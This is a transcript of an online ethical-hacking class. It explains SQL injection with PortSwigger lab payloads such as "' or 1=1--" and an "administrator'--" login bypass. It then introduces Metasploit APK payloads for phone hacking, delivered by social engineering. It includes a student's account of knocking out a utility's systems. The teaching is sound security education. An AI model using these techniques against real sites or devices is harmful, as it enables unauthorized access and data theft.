Anyone of you know the full form of SQL? What is this SQL?
Structured query
Full form,
language.
only full form. Yes. Structured query language. Niche. So whenever we see the SQL, it means we are talking about the database. What is this database? This database is like a big collection of information that the computer can store and organize. Okay, let me add some student in this meeting. So if I take an example of database, suppose you have a bookshelf. Okay, and in that bookshelf, you have a lot of books and you have to maintain what is the author name, what is the title of that book, when you purchase that book, do you have the extra copy of that book or not? Okay, so you have to maintain all the records. So instead of writing all the things on a paper, you are maintaining a database. Okay, so like you are writing here name of the book and then title of the book, author of the book, and date of purchase, who borrowed that book from you, all of things. Okay, and here the serial number of the book. So you maintain all the data in the database. So that would be very easy for you to see which book do you have and what is the title name of that book, what is the author name and when you purchase that book. And if you want to delete something from this database, you can easily delete any name of the book. And if you want to see have you someone borrowed particular book from you or not, you can check in your database. And if you want to add some book in it, you can add particular book in your database. Okay, so this database is maintained uh, and this database is also maintained by different industries or by different organizations, like in the medical field or like in the different, like in the hospitals. They maintain in the organization, every organization, these kind of database are maintained. Okay, so this is basically the database. And the topic is injection, SQL injection. Okay, so what does this injection mean?
I'm
So
inserting.
this injection, mhm. Yes, Paritosh?
I'm inserting something.
Yes. So in this, the attacker is trying to insert or enter some code into the web server. I'm writing here. The attacker trying to inject or enter some code into the web server. So that, what is the aim? So that the data can be manipulated. Okay, so attacker is trying to gain the access of the database. So if we talk about the SQL injection, so what is this SQL injection? SQL injection, so the attacks to gain access to database and steal the valuable information from database and also destroying or alter data in database. Okay, suppose if I talk about the company, so what database company can maintain? So company can maintain the name of the employee. So it's an employee table. Suppose this table name is employee, and here is the employee name, and then here is the designation of that employee. What is the age of that employee, and what is the um, rank of employee. Okay, and here can be the employee ID. Okay, this can be included in the database if an organization is maintaining the data of any particular uh, employees, not particular employees, the employees database. Okay. So how this SQL injection occur? Okay, so it occur when the malicious SQL statement. What is this malicious SQL statement? It means that the unwanted statement which is having some malicious code. Okay, in the inserted in the form field. Suppose what I'm trying to say about the form field. So what I'm trying to say about the form field, suppose there is the username field and the password field, and you have to click on this submit. Okay, so what happened? Okay, so do you know there are two types of websites? That is a static website and the dynamic website. What is the difference between the static website and the dynamic website?
Ma'am, dynamic has hyperlinks on it and redirects you, and static does not have any redirection.
Yes, you are almost right. Anyone else want to add something? Any idea? Okay, I'm telling you. Static websites means the normal website. Okay, which only provide the information. Like there can be a blog page, and there is a author page, and no other information is provided. Like the login page will be not there, and the sign up button will be not there, payment portal will be not there. So these kind of websites are the static websites which only provide you the information. Like something blog page, if I want to say, if I want to give the example of static website, so it can be the blog page. Okay, see only the like topic will be there, about the topic will be there, and there is no login page, only the information is available on that page. And if we talk about the dynamic website, so dynamic websites, all the things like there will be the login page, there will be the payment portal. So these website, in short, these website interact with the database, and these website do not interact with the database. Okay, so this is the basic difference between the dynamic and static websites. So if you have the like if the website is interacting with the database, so there may be a chances of SQL injection vulnerability. Clear? By using the SQL injection vulnerability, the SQL attacker can gain access to the database and take advantage of the information that is present in the database. Any doubt till now, anyone? So you guys tell me in which kind of a website SQL injection vulnerability can be found? In the static or the in dynamic one?
Dynamic.
Dynamic.
Yes, in the dynamic because they are
Dynamic.
interacting with the database. Exactly, right, dynamic. So what the hacker tried to do with the SQL injection? So like if suppose, yeah, if I give an example, if the attacker gain access of find the vulnerability in Amazon.com, so he can change the price of the product, right? He can manipulate, he can change the product, he can manipulate the database, he can change the product number, he can change the code number, he can apply any coupon in that website.
Ma'am,
Okay,
ma'am,
so mhm. Sorry.
ma'am, yes, hello, ma'am, can you hear
Yes,
me?
yes, yes.
Ma'am, if in
Yes.
Amazon.com, if the hacker opens it and if somehow can enter in the Google code system where the fixed prices of every product is given, so he can he can easily use the SQL injection and then completely change the whole system only, means whole price system only. Uh,
Yeah, if he can access the database, he can do anything with that database.
But ma'am, doesn't but the Amazon has the counter security system. Means whenever someone will try to hack the system, the whole network will be shut down immediately.
Yeah. So
They have
this is not important that in every website you find the SQL injection. Okay. So if there is a vulnerability, it means there is some protection for that. So you can do the whitelisting, and there are so many others way to protect from many kind of vulnerability. So see, it's not necessary if you are like if you are targeting Amazon.com, it's not necessary that SQL injection is there or any other vulnerability will be there. It's not necessary. When the developer are developing the website, so see, they are humans, they can left any loophole in that during the development of that website. So what the hacker are doing, hackers are taking the advantage of that loophole. So this is it. It's not necessary that the particular vulnerability is there, will be there. It's not necessary. It might be there.
but ma'am, the computers are continuously evolving. Means the systems are continuously evolving to fight against such type of hackers. So how means it may not be also possible for the hacker to find any site that does allow the SQL injection.
See, if there is a vulnerability and hacker find that vulnerability, so he can. It's not. I'm not only talking about the SQL injection. I'm talking about the all vulnerabilities which are available on in that VAPT and WAPT. So it's not necessary that the Amazon.com, or if I talk about the any other company, they fully protected and fully like organized. Okay, we are on internet, so there is loophole. We are not 100% safe. So it's not necessary कि एक particular vulnerability होगी होगी सिर्फ एक SQL injection vulnerability नहीं होती, बहुत सारी vulnerabilities होती हैं. There are so many kinds of vulnerability. तो जरूरी नहीं है कि अगर किसी वेबसाइट पे vulnerability मिलेगी ही मिलेगी, क्या पता वो वेबसाइट इज 100% सिक्योर. ठीक है, और जरूरी नहीं है कि दूसरी वेबसाइट पे अगर आपने एक वेबसाइट पे एसक्यूएल इंजेक्शन निकाला, तो जरूरी नहीं है कि दूसरी कोई आप वेबसाइट पे आप टारगेट कर रहे हो तो उस पे भी एसक्यूएल इंजेक्शन निकलेगा. मे बी दूसरी वेबसाइट एसक्यूएल इंजेक्शन से प्रोटेक्टेड हो, बट उसमें कोई और वर्नेबिलिटी हो, मे बी आइडोर वर्नेबिलिटी हो, और मे बी सेशन हाईजैकिंग हो, एंड देयर आर एन नंबर ऑफ वर्नेबिलिटी. सो इट्स नॉट नेसेसरी कि हर वर्नेबिलिटी हर एक वेबसाइट में मिलेगी मिलेगी, या It's not important कि मिल ही जाएगी कोई ना कोई vulnerability. It's not necessary.
Okay, ma'am.
Any question?
Okay, ma'am.
No, no. If you want to say something, you can. Arigna?
No, ma'am, there is no question. I have no question now at present. If anything arises, I will ask you.
Okay. Anyone else have any question? Okay. So now let's start and see how exactly this vulnerability, what is actually happening on the back end. Okay, suppose there is a user and this user wants to access his. My voice is like, Devanshi, can you mute yourself because my voice is coming back to me again. Okay. So this is the user form, and here this user can enter the user ID and the password, and here is a submit button. Okay, so if he's entering the password, so there can be many conditions on that password. Suppose the capital letter should be there, and other should be minimum 4 small letters should be there, and a special character should be there. Some kind of condition can be included in the password. So this kind of condition can be analyzed by the hacker, and he can what he can do, he can enter the SQL injection in this. Okay, suppose user is entering his user ID and the password here, and click on this submit button. So what is actually happening? I already told you in the suit class, this is my server. He's going to access the web server. Okay, so when the attacker is doing the SQL injection, so whatever the statement he's entering in this password field, so that could be the malicious code which he is injecting, and he's trying to access the web server. So whenever he enter the malicious code and it is matching with the username and the password, he's trying to access the web server, and this web server check whether the user name and the password is correct or not. So from where this server is going to check? From the database server. It is going to check whether this user ID and the password is right or not. Okay, so in this, the query is going in a URL form, and in this, the query is going in a SQL form. Okay, so when the web server is checking the user ID and the password, it cannot identify whether it is entering by the real original user or it is entering by the attacker. What it is doing, it is only checking whether the password or the user ID is correct or not. And if it match with the original user ID and the password, then the server give access to the account to the attacker. Okay, now if he get the access, then the attacker. Arigna, do you want to say something? Okay, so the attacker can log into the account and can have access to the SQL injection. So we'll do the practical of it, and if you are not getting it very clearly, so you will get it, and when we'll do the practical. Okay. So with the attacker can easily, with the help of SQL injection, can enter into the SQL server, and what he can do with the help of this SQL injection? I already told you in the first slide. He can modify the database, he can change the detail, he can gain complete information of the customers. Okay. So we are going to use the port swigger for doing the practical of it. So let me open my Chrome. Just wait a second. I'm stop sharing my screen. Just wait a second. I'm opening port swigger. Okay. So when you click on this first link, so I already told you when we were doing Burpsuit that you have to log in into that account. Okay. So first you have to log in into that port swigger. And once you log in or make your account, if you don't have any account, make your account and then go to the Academy section. In the Academy section, there is a learning path. So when you click on this learning path, you will get the different topics of which are available in the port swigger for your practice. So one of them is SQL injection. So we are going to see the SQL injection. See, this is the SQL injection. So what you can do, you can read the content from here. There is a picture for the reference. I'll explain you this picture. And then you can do the lab here in lab section. And these are the topics. So retrieving hidden data and subverting application, we are going to do in the
What
summarize
do
session.
we, teacher?
And the
I have
union
a
and the
question.
blind SQL injection. Sorry.
I have a question. What do we exactly have to do
Mhm.
in labs?
I'll show you. We'll do the labs. Okay.
Yes.
So this retrieving and subverting are covered, will be covered in this session, and the union and the blind are the part of the guru sessions. Okay. So let's start. First, understand in this SQL content. So I'm copying this image and paste it here. Okay. So see, there is also one thing whenever we are talking about the database. Okay. So there is a column and the rows. So we are just focusing on the columns. To extract the data, we are focusing on the columns. Okay. Suppose there is a database and there are different kind of table in that database. So what we are trying to do, we are trying to extract the information from these table, and in this table these kind of rows and column are available, and by using the columns we try to extract the data. Clear? So we are focusing on the like how many number of table can be there and how many like how we can extract the data using the columns. See, in this SQL injection, it's not just a tool, it's a practice. Okay, so you have to practice a lot because it's on a hit and trial basis. What you are applying and what response you are getting, it's totally depend on that. So it's not like that this is a thing you have to apply only this thing and you will get you can get into any system or you'll get the you can interact with the database. This is not the thing. You have to apply your logic, you have to apply your own mind, what query you can put in the in the server, and how you can interact with the database, how you can extract the information, and you have to see what query I am putting in, how I am getting the response, and if I do this, what response can I get, if I do that, what response can I get. So it totally depend upon your logic and your practice. Okay. Clear this thing? So do practice of this SQL injection.
But on what website do we have to practice SQL?
So see, there is a SQL injection website. Portswigger, there is a SQL injection. You can see there are so many labs which are available in this SQL injection. If I go directly to the labs, view SQL injection labs. So if I click on it, you can
Ma'am, ma'am,
see that there are so many labs which are available there. Okay, you can practice those labs to master in this SQL injection. Clear? And you can see here that how many
मैम
labs are available in this
हेलो
SQL injection. Yeah,
मैम ये लैब के क्रेडेंशियल्स कहाँ पे आए हैं
18 labs are there. हाँ, labs क्या क्या कह रहे हो आप?
मैम ये लैब हमें इस पे काम करना है ये लैब्स पे
हाँ हाँ हाँ, हमें इन्हीं labs पे
तो
काम
मैम
करना
इसके
है जो कि
क्रेडेंशियल्स कहाँ
पोर्ट्स।
पे आए होंगे
मैं आपको labs खोल के दिखाऊंगी, labs करके दिखाऊंगी, then you will come to know कि आपको lab कैसे access करनी है, ठीक है?
ओके मैम ओके
The topic we are covering in this, that is retrieving and subverting application logic. तो ये दोनों labs मैं आपको करवाऊंगी, ठीक है?
ma'am,
Yes.
ma'am. In the diagram, in the lab diagram, it was showing that the hacker is actually trying to hack the personal ID by one encryption in the means in some kind of form means when you press submit, it directly hacks the password and the username. Is it?
Your question is if there is any encryption in the username and the password.
No, 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 not that.
Mm-hmm.
It's means when he's hacking the password and the usernames of the respected victims, he the in the middle figure it is showing that some kind of application with written submit, and in that programming one of the program has the hacker encryption means which will help the hacker to further find the password and the username. So, so ma'am, does it mean that the hacker has already means time fitted means already has fitted a malware in the program?
No, actually, what has happened? This all totally depend upon your reconnaissance, which I taught you in the previous classes. That the methodology one, attacker's methodology. So the first one is reconnaissance. So it's all depend upon your reconnaissance. You have to identify if I am talking about the IT company. So what can be included in their database and what can be the column of the database. It's totally depend upon the reconnaissance. So the जितना अच्छा आप रिकॉनासेंस करोगे उतना अच्छा you can do the hacking or you can extract the information. I hope I answer you, Arigna.
Yes, ma'am. Understood.
Okay. So let's see. Just ignore this one for a while. See what is happening here. This is my SQL query. Okay. Now, what is this SQL query is saying? It is saying select. Select means it is telling it that select. What select? Select name and description. Name and description are the columns. let me see why is this not showing me on my page. Okay, just wait a second. Now it's okay. So what it is saying, select what? Select name and description. So here is a name column and here is a description column. Okay, from where? From the product. So product is my table name. It is saying select word, select name and description from the table where जहाँ पे category, there is a column of category again. This is a column. Category equals to gift होना चाहिए. Okay, this is what this query is saying. Select name and description from where? From the table name products. जहाँ पे where category is equals to gift. So the information related to the gift, the information you want to extract related to the gift. So what information do you want? The name and the description of this category. Okay, now what is hacker is doing here? Hacker is applying his malicious query. Now what is this hacker is saying? Let's see. He's saying union. Union means in the SQL injection, union means add two tables.
I
Okay,
can't
so
see
for
your screen, teacher. It
okay,
just went
let me
blank.
okay, let me share it again. Is it visible now?
No, ma'am.
Yeah,
No. My screen is visible to everyone.
for me it is
Please raise your
visible.
hands.
Yes, ma'am.
Please raise your hand. Give me confirmation.
Yes,
Okay,
ma'am.
fine. So, should I explain you again this part?
Yes, ma'am.
Okay, let's do it again. Okay, so this is my SQL query. So just remove this one for now. Okay, so this is saying select what? It's a journal English word select. Okay, what? Name and description. So let's make a table. What it is trying to say in the SQL query, in this SQL query. So it is saying select what? Name and description. From where? From the table name products. The name of my table is products. So it is saying select what? Select name and description from table name products जहाँ पे where category is equals to gift. So you want to extract the information of the gifts. Okay, so it is saying select name and the description. So I already told you that we are using the columns to extract the information, not the rows. Okay, it is saying so there can be any other like parts like gift, and there can be accessory category. There can be some what should I say? Let's take an example. XYZ category. There can be any category. Okay, or home appliances category. There can be any category, right? So what it is saying? Select name and the description from, and it is giving the product name of the table. You select from this particular table what where category is equals to gift. So you want to extract the information which is related to the gift. There can be some other categories as well. So you want the information related to the gift. Okay, now what the hacker is doing here, it is applying his malicious query. What is this query saying? He is saying union. See, I told you that in a database there can be different kind of tables. Okay. So suppose there is a table product and there is a table user. There are two different tables. So if we want to merge the information of two tables, so for that union is used in the SQL injection. So union means to add, to merge the information of the two tables. Okay. So the hacker, what is this saying? He's saying union. Union means add the information of other table. What is the information he want? He's saying select. Select means general English one. He's commanding what? Select. What he want? Username and the password. He wants the username and the password. From from where? From the users. From the table name. This is the table name and these are the column. And he wants the information that. So what will happen when this query, suppose this is the query. So what will happen when this query goes to the database? So there is a union also. The database will read whole query as a one query and give all the information to the server, and the server give the response to the user. Clear? So because of this union, the attacker is able to extract the information of the other table also with the original query. He is adding his malicious query using the union in the original query. Now what will happen? The server will read the whole query as a one and give the whole information to the attacker. Suppose here attacker is sitting. So give whole the information to the attacker. Clear this thing?
Yes, ma'am.
Okay, clear to only one person? Only one student? Rishan, Pankhi, Arigna,
Yes,
Yes,
ma'am.
ma'am.
Disha, Divyam, Dia, Ganesh. Okay,
Yes.
Yes, ma'am.
so let's
Yes,
move
ma'am.
forward. Okay, good. So we are going to do the retrieving hidden data. So how to find the hidden data? Just go to the code swiggle and there is a topic retrieving hidden data. Okay, so we are going to cover this. So before that, let me draw a diagram, then you will understand more clearly. Suppose there is a user, there is a server, and there is a database server. Okay, just do it. Okay, see what I told you that when we are sending the request, it is going in the URL form, right? And when this web server is talking to the database, it's in a SQL query. So this URL is converted into this query. Okay. What is happening here? It is saying select star. Star means everything. From where? From the products. Products mean it's a, let me use another color so it will be more easy to understand. Star means everything. Okay, so product here from where? From the products. It's a table where jahan pe category is equals to gift. Okay, and release equals to category is my column and the gift is my information that I want to extract, and it's a operator. Okay. So in this there are operator, that is the AND operator and the OR operator. So what is this? The difference between AND or OR? If there is a AND, it means that compulsory, suppose there is a and there are two conditions. One condition is here and one condition is here. So if there is a AND between them, so it means both the condition should um, satisfy. It means this should be satisfied and this also should be satisfied. And if the OR is there, that one or this one condition, it means either this condition or this condition, any one of this condition. Okay. So it's not necessary that both the conditions should satisfy at the same time. Either this condition is satisfying or this condition is satisfying. Right? Understand this thing, what I'm trying to say here.
Yes, ma'am.
Okay. So
Yes, ma'am.
Yes, ma'am.
okay. Okay. So what is this in the SQL injection? That is hyphen hyphen. So what is this hyphen hyphen means? Whatever you are writing, whatever is written after this hyphen hyphen, all the things will get ignored. Okay. Suppose if I am putting hyphen hyphen here, this hyphen hyphen here. Okay. It means that this whole query will go to the database server, but the database server read only till this here. The database server will ignore this query. This gift and release equals to 1 is included in this query, but because of this colon hyphen hyphen, database ignore whatever is written after this colon hyphen hyphen. Okay, so let's start the that lab and let's understand what is actually happening. Okay, I'm starting this lab. Open in a new tab. Okay, take a 2 minutes. Not 2 minutes is too much. Take a 1 minute and read what is written here. What this lab is trying to tell you and what this lab is trying to do, what it wants from you.
Select everything from the table products where the category, which is a column, should contain the information gifts and release equals to whatever the next is.
Yes. So this lab wants us to release all the product. See, where it is. Let's start the lab. So how I started the lab? See, I just click on it and then I click on this access the lab. And if you like, if you are solving the lab and if you don't know, you stuck somewhere and you don't know the answer, so there is a solution which is available here, so you can refer this solution to solve this lab. And there is a community solution is there in which the person of this SQL injection, the person of the sports figure solve this lab for you, and he's explaining how you can solve this lab. Okay. So you can see the videos how this he solved this lab. Okay. And this solution and community solution is available in all labs, not only this lab, all the 18 labs, this is available. The solution and the community solution is available. Okay. Okay. So you can see if I click on the gift, there is only three products. If I click on the pads, there is three products. So what this lab want to do, this lab try to say that you have to display all the products which are available on their site. Okay, so if I go to this and can I rub this? Okay, so what you are going to do is putting this colon hyphen hyphen. Okay, and there is also one thing in SQL injection, that is a true condition. True condition and the false condition. What is this true condition? See, if I write 1 equals to 1, is it true and always remain true? Yes or no?
Yes.
Can it be false?
No.
No, ma'am.
Okay. So what is happening in the SQL injection? Suppose whenever, if I take an example, see, there is a username and the password. I'm giving you example, and this is the database username and the password. Okay, so what this database server is checking, it is checking whether this username equals to this username, this password is equals to this password, and it is checking whether the condition is true or not. Okay, if I write something here, true condition in the password, I give the true condition, and this condition is goes to the server. So database is checking whether this is true or not. If it is true, then the database give the that information to the web server, and web server give it to the user. Okay, if the condition is true, and if the condition is false, then you can get the error. Suppose the username is not right and the password is not right, or re-enter the password, this kind of error you can get. Okay, so what we have to do, we have to just put the true condition, so that the we have to apply this condition, and so that the database can pass this condition. Okay, so there is a true condition in the uh, SQL injection. Okay, so here is the thing. If what it want, what the lab try to do, lab want the released and unreleased product and released product. Okay, so we are putting this colon hyphen hyphen here. Okay, so we are putting where? Here, either. Okay, after S, colon hyphen hyphen, and this hyphen hyphen which you are seeing in the last, that hyphen is of this. Okay, so what you are doing, you are writing like this. This is gift, and then you are adding this thing. I'm just changing the color. You are adding this. Okay, and this is of this. Okay, and what you are doing, you are giving it a true condition. Okay, and by putting the or condition, which I tell you that this condition should be satisfied or this condition should satisfy. And what you are doing, you are putting or condition. Let me change the color. I'm writing here. Here, or condition before the hyphen hyphen. What you are writing? This gift. This is there. After this hyphen hyphen, you are writing or 1 equals to 1 and then hyphen hyphen. Why you put this hyphen hyphen in the end? Because you want that all these things should get ignored and whatever you have added should be considered. Okay, after this hyphen hyphen, everything will be ignored. So you are putting your query before this hyphen hyphen. So whenever this query goes to the server, so server will read till this hyphen hyphen, right? And the server will ignore all this thing. It will be in the query, but the server will ignore all this thing. That's why you are putting your query before this hyphen hyphen. Clear that thing?
Yes, ma'am.
Okay, but this is the SQL query. So where you are going to add this in your like you want to solve the lab and you want to do the SQL injection. Okay, so where you are going to put this? You are going to put this in the URL. So how you are going to write in the URL? Let me show you. This is my URL. And you will write like this. Is it visible to everyone? Should I like zoom it? Fine. So what you are doing?
Yes.
This was your. So this was your original URL. And what you are adding? You are adding after the gift. What? This colon or 1 equals to 1 and then hyphen hyphen. You are adding your query here like this. Okay. So let's try in the lab. This is my lab and let's go to the gifts. So you can put it like colon or 1 equals to 1 and then hyphen hyphen. Hit enter. Your lab is solved and you can see all the product here. You can apply it in pets category also. So you can just simply put colon or 1 equals to 1 and then hyphen hyphen. Hit enter. So you can see all the product here. Clear this thing?
Yes.
Okay. So we are moving forward and we'll do the retrieving hidden data, subverting application logic. So let's see the lab first. Okay, so this lab, what is trying to do SQL injection vulnerability allowing you have to do the login password. Okay, so this lab given you the username, which is totally depend upon your reconnaissance. Okay, I have already told you reconnaissance is a main part of the hacking. Okay, so for solving this lab provide you the username if you are doing it in the real life. So the username have to like you have to find it by yourself with the help of the reconnaissance. So the administrator is the username. So try to access the lab. So what it is saying, it it has given the username and we don't know the password. And what we have to do, we have to log in into the administrator account without the password. And see, whatever the lab is given in the sports figure, it totally depend like it related to the real life vulnerabilities. Okay, if you are practicing this labs, it means that you are practicing the real life vulnerabilities. These kind of vulnerabilities are available in the real life websites. And I am like giving you the warning here, please don't directly go in any website or try to do this SQL injection or any other vulnerability attacks. Otherwise, in the next day, the police will be on your door. Okay.
I will
So
run from
the
the house.
Mhm.
I will run from the house only.
Sorry.
Means when you told her that police will be on your door, then I will run
Mhm.
from the house at night only.
See, with the help of IP address, they can find your address.
I will means I will create a new email address and everything. Will mean new password, fake ID, and then so.
No, no, no. The IP address will be not fake now.
Uh,
Let's suppose you are using the Geo router. Okay, the Geo is providing you the service, so your IP address can be tracked.
uh,
Okay, they'll not find you with your username and the ID and the password. That can be fake. They already know it. They find you with your IP address. They can like if you try this kind of vulnerability and they find some unsuspicious activities are happening on their website, they can block your IP address. Okay, and if they find it serious, like serious kind of vulnerability, like someone is again and again trying to attack them,
ma'am,
so
tried it
they can
once.
take action against you.
Ma'am, hello, ma'am.
Mhm.
Ma'am, my brother and I once tried it, and
Mhm.
the whole means actually it was the attack on CSC Kolkata Electric Supply means
Mhm.
and I think for 1 hour the whole power went out because all the main computers were shut down due to that cyber attack. And brother was arrested, but brother was a minor, so he was kept in jail for 7 days, and then means
He was
he,
released. Yeah, that is why I'm saying, because of his IP address, the police find him and found him, and they put him in jail.
no,
And
he was with us. We didn't only know that such catastrophe has happened that CSE system was hacked. We were just means we were just doing it. Means we were just open the CSE website funnily and means trying to hack, but we didn't know that the whole system will crash down for 1 hour.
Hmm. So that is why I'm saying don't try it in live websites or the real websites. So there are so many labs are there. You can try on that. Okay. So there are
But
vulnerable.
can't. But that means someone can track you down also using your IP address. If police can, then anyone can track you down.
Yes.
Yeah,
But isn't that risky?
yeah, it is risky. Like it's not easy. See, what is actually happening when you are trying to attack on a website. Okay, your IP address is going there. What See, you will learn in the Guru sessions how this handshake is happening and how the ping thing is happening. Okay, so you will learn all this thing and you will see how your IP address is going to the other person. So
Rudransh.
you know what,
Yes.
the police will contact to your route that service provider. So the service police have authority. Okay, they have a proper government authorization to find your address. No one can easily find your IP address like this. So they have authority. They can go to the service provider and they say that this person is doing this kind of attack. Please provide me the address of that person. and there are so many ways that person can find your geolocation. And I already I will show you in the Metasploit when you are doing the mobile hacking. So the geolocation can be found very easily.
Ma'am, but ma'am, when we play games, means like PUBG or Free Fire or any worldwide game, which means multiplayer, with a multiplayer game in which everyone plays. If any hacker is also present, he may easily hack the system and then find our IP address from the game, and then also he can find our address.
That thing I'll cover in the Metasploit. That question I'll answer you when we'll do the Metasploit part. Then I'll answer you this question. Okay.
Uh,
So let's continue this. Okay, so go there and then go to my account. You have to log in into the administrator, right? Suppose I'm writing any username here and any password here. Suppose username is username. I'm writing the wrong username. Okay. And the password is anything. And I click on login. So what is happening? Invalid username and the password. It is giving me the error. So see, let's see what is actually happening here. Okay, yeah. So let's understand this thing. Okay. So what is this? Now you guys tell me what is this statement saying?
It is
What is the
saying that
column? What is the table? Mm-hmm.
select everything from the
Hmm.
users column where username is Veena, Wiener,
You are saying that
and
this is column and this is what? Username is what?
username is also a column, and the
Okay.
table is the Veena. Inside the table, the text is the Veena, and the
Hmm.
password. I think it's also should be a column where
Hmm.
the text is blue cheese. And these both the conditions should be true because and is used.
Yes, you're right.
Ma'am,
Anyone
user is a
else?
table.
Yes, user is a table. You are right. Anyone else want to add something or want to explain it?
ma'am, can you please again explain how what she told? Means I couldn't understand.
Yeah, I'll explain you again. I'll explain you. Don't worry. First, give me your feedback, like what you are understanding by seeing this. I don't think so. There are only 2 students in this class. There are how many? There are 19 students in this class. Only 2 answered me. Why? Anyone else? Pankhi?
Ma'am, I won't be able to answer. I'm not clear yet.
Okay, so like the previous topics are clear to you? Pankhi, I'm asking you. You're not audible. Okay, see what this is saying. This is saying select what? Select everything. Whatever is available here, select everything. Where? The table is users. Whatever is available in this table, users select everything where जहाँ पे username should be what? Linear. And the password is blue cheese. Right? So suppose if it is going to the database. This is a database server and there's a table in the database with the username and the password. Okay, and suppose I am here using the username and the password page and click on the submit button. And I'm writing the username is linear and the password is blue cheese IO. If I write this and this goes to the database, and what are the credentials available in the database? That the username is linear and the password is blue cheese. So is this condition true according to the database? No. So what the database will do? Database will give us error like this, invalid username or the password. Okay. So, okay, fine. You guys tell me if I'm rubbing this. So, in the question, my username is administrator. Okay, so where should I put this hyphen hyphen? Colon hyphen hyphen. Anyone?
Teacher,
At the
before
end.
and.
Before and anyone else who was saying
I guess the hyphens should be at end.
at end like here
Ma'am, after blue cheese.
Yeah.
after blue cheese? Okay. Anyone else? Two students are saying here and Swara is saying before and. Anyone else? Okay. So this Swara is right. This should be put before and. Why? Because this is the compulsory situation. And if we put after that, so we don't have a password. See, this is my table, right? This is a username and this is a password. I have the password administrator, but I don't have the password. I have the username administrator, but I don't have the password. If I put this after blue cheese, it means that it compulsory needs the password. But do I have the password? No. So where should I put it? Before the administrator. So that this whole query after this hyphen hyphen get ignored. It means when the query goes to the server, so this if I put before the password, this column get ignored. Okay, so where I can put this in the URL in the form field, just look into it. Here is my query. Okay. So see, but I have explained you that if I put this before and, so what does it mean? This whole query will get ignored. And this can log in without the password. Okay, So what I have to do, if I go to the lab and I put here the username, that is administrator, and put the query colon space hyphen hyphen, and I'm writing the password, suppose 1 2 3 4 5 6 7 8 9. I don't know the password, and click on the login. So see, I can bypass using this simple method, and your username is administrator. I am the administrator right now. Clear to everyone?
Yes, ma'am.
Yes, okay. So can we extend our class half an hour, because one topic is left, and it's already 5:30 or 5:22. Can we extend our class? Are you all
Yes,
comfortable with that?
I am.
Okay.
No, ma'am, I have a
Ma'am,
tuition. I have to leave.
ma'am, I have to go somewhere. I'll see the recording. It's okay.
Okay, Hia and Arigna, please refer the recording. And
Yes,
I am
ma'am.
extending this class by half an hour, and we are covering the topic mobile hacking. Okay.
Okay, ma'am, sure. Thank you.
Okay, bye.
Bye, ma'am.
Okay, so we are doing the Metasploit now. So this SQL injection is clear to everyone?
Yes, ma'am.
Yes, ma'am.
Okay, so let's move forward and open your Kali Linux, because we are going to do it in Kali Linux. Start this machine.
Ma'am,
Mhm.
teacher,
Yes.
I don't know. My Kali Linux is looking different than yours.
Yeah, it's maybe because of the. Is it in purple color?
No,
No, it's totally fine. If it is running fine, so it's totally fine. It's because of the version.
no. Like I saw you open command prompt from that right hand corner, right?
Command prompt.
I
I
have
didn't.
like app and that all type of thing.
Okay, 1 second. It is totally fine. If it is, it's maybe difference of GUI and all these things. But if your Kali is running,
Like you have
then it
not
is
got
fine.
taskbar down and you have not got select all apps and that all.
Okay, can you share your screen and show me?
Yeah, wait.
It might be a different version.
Yeah, at the time of
No,
installation, maybe you select some. Mhm. It's
it
okay.
can't be
You share
because
your screen.
you only showed me. Wait a second, huh? Can you see it?
Yeah, click on it.
Yeah. Wait a second, it's loading. Is Kali Linux pen drive bootable?
Yes.
Oh,
Okay, so
let's
you are
see.
using a different GUI. There is three. I already told you that genome and KD plasma, right? So maybe at the time of installation, you selected KD plasma or
Oh, so
genome.
will it cause any difference or same?
No, same. Only the look and feel is different, but the work of both is totally same.
Yeah, fine.
Okay.
Hmm.
Stop sharing your screen, please. Okay. So see, Metasploit framework is already available in this Kali Linux. Okay. So we are going to use this Metasploit framework. So before starting this Metasploit, I just want to tell you this Metasploit framework is a product of Rapid 7. So let me open it.
Of what?
Rapid 7.
Graphics
Metasploit.
7.
Rapid. I'm showing you. Wait. Rapid 7. Okay. So we have a two version of Metasploit, that is Metasploit Framework and Metasploit Pro. So in this Kali Linux, Metasploit Framework is available, which is a open source. Open source means which is freely available.
Which is
Ma'am, can I leave?
freely and you can edit
Ma'am,
it, but you have to give it
Yeah,
in the same way.
one by one, please. What?
ma'am, can I leave the meeting because I have a class?
Yes, Arigna, please, and please refer the recording after this class, okay?
Oh,
I'll share you the link in the WhatsApp group and I'll upload this in the drive. Yes, Rudransh.
Yeah, this open source projects are the projects which are free and you can view their code. You can
Mm-hmm.
even edit those codes, but the condition is you have to give the edited version also free and this credits.
Open source means that this particular tool or this particular, suppose if you're talking about the code, so that is freely available to the public. Okay,
Yeah.
anyone can come and can use that particular code or particular tool or particular framework. Okay, that is the meaning of open source. If I talk about the nmap tool, so nmap tool is an open source tool. It means that anyone can use it without giving any subscription, without paying for that tool. That is the meaning of open source. So this Metasploit framework is an open source. And if we talk about the Metasploit Pro, so we have to take the subscription of it and then we can use this Metasploit Pro. Okay. So before getting further, please tell me, please tell me what is the meaning of vulnerability? What you know about the vulnerability? What is that term mean?
It's like a loophole in the
Yes.
program.
Yes. Anyone else? So vulnerability, Swara is right. Vulnerability is kind of a loophole or a weakness that can be exploited by the cyber criminal to gain some unauthorized access to the computer system. Okay, so by using this weakness or a loophole, we are going to do the mobile hacking. And what is this payload mean? What is the meaning of payload? So with the help of payload, we are going to create this weakness. Okay, so it's kind of code which help us to create the weakness into the system. So what we are going to do here, first we are going to create a payload and we transfer this payload to the mobile device, which create the weakness or a loophole into that mobile device, and we are going to exploit that. Okay, and see, we are doing this mobile hacking in a same network. Same network means if you are sitting in a range, like if you are targeting any mobile device and you both are in a same network, then you can do this mobile hacking. And there is a different process for the different network. Suppose I'm sitting here and Sora wants to attack me. Okay, so there is a different method for that that will be covered in the further classes. That means in the guru. And we are looking. We will see how we can do in the same network in the summarize sessions. Okay. It means that if I take the example of Sora and me, both are in the same network. We are in the same IP range. Okay. And for creating the payload, we are going to use the APK file. So what is this APK file? So this APK file we have to send to the mobile device. This APK file will create the vulnerability or the weakness, and we try to exploit this APK file. Okay, so let's see
But how do we
first
get that?
how. Sorry.
Sorry, I didn't understand what is APK file.
See, this APK file is a file which create the vulnerability into a mobile device,
Okay.
and we will create this APK file. I'll show you how we are going to create this file and create this payload. And see, if I talk about sending the that payload to any device, so it's totally depend upon the social engineering. Do you know the meaning of social engineering?
No.
